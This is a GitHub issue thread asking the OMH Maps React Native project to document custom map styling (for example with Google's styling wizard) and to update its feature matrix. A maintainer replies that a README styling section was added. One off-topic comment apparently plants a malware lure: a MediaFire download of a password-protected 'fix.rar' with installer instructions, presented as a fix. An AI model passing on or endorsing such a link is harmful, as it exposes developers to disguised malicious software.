### ISSUE TITLE
Missing Example for Styling Maps in OMH Maps

### ISSUE THREAD

**Issue by dzuluaga** [openmobilehub/react-native-omh-maps#105]
It appears that there are no examples provided on how to style maps using OMH Maps with the [Google Maps Styling Wizard](https://mapstyle.withgoogle.com/) or any equivalent tools for other providers. This is a critical part of the requirements, and users need guidance on how to apply these styles across all supported map providers.

### Expected Behavior
- Include examples demonstrating how to apply custom styles to maps using the styling tools provided by each map provider (e.g., Google Maps Styling Wizard for Google Maps).
- Ensure that these examples are applicable to all map providers supported by OMH Maps.
- Update the feature matrix to reflect the support for custom map styling, including which providers support this feature and any limitations or additional steps required.

### Current Behavior
- No examples or documentation provided on how to apply custom map styles across different providers.
- This functionality is not reflected in the feature matrix.

### Impact
Without examples or proper documentation, users might struggle to implement custom styles on their maps, leading to a lack of consistency and potentially poor user experience. Additionally, the absence of this feature in the matrix might lead users to believe that custom map styling is unsupported.

### Importance
This is an important feature that was part of the original scope and requirements. It is essential for maintaining a consistent user experience across different mapping solutions, which is a key objective of the OMH Maps project. The absence of this feature in the documentation and feature matrix is a significant oversight that needs to be addressed promptly.

### Suggested Solution
1. **Documentation**: Add examples in the OMH Maps documentation on how to style maps using tools like the Google Maps Styling Wizard and apply these styles across all supported map providers.
2. **Feature Matrix**: Update the feature matrix to include support for custom map styling, detailing which providers support this feature.

### Additional Context
This enhancement is crucial for developers who need to maintain a consistent look and feel across different mapping solutions. It should also be part of the feature matrix to ensure transparency about the capabilities of OMH Maps.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by adamTrz** [comment]
Hi @dzuluaga 
I've added a styling section to Readme guiding users how they can apply styles to `OmhMapView`

**Comment by openmobilehubgh** [comment]
Thanks, Adam. LGTM
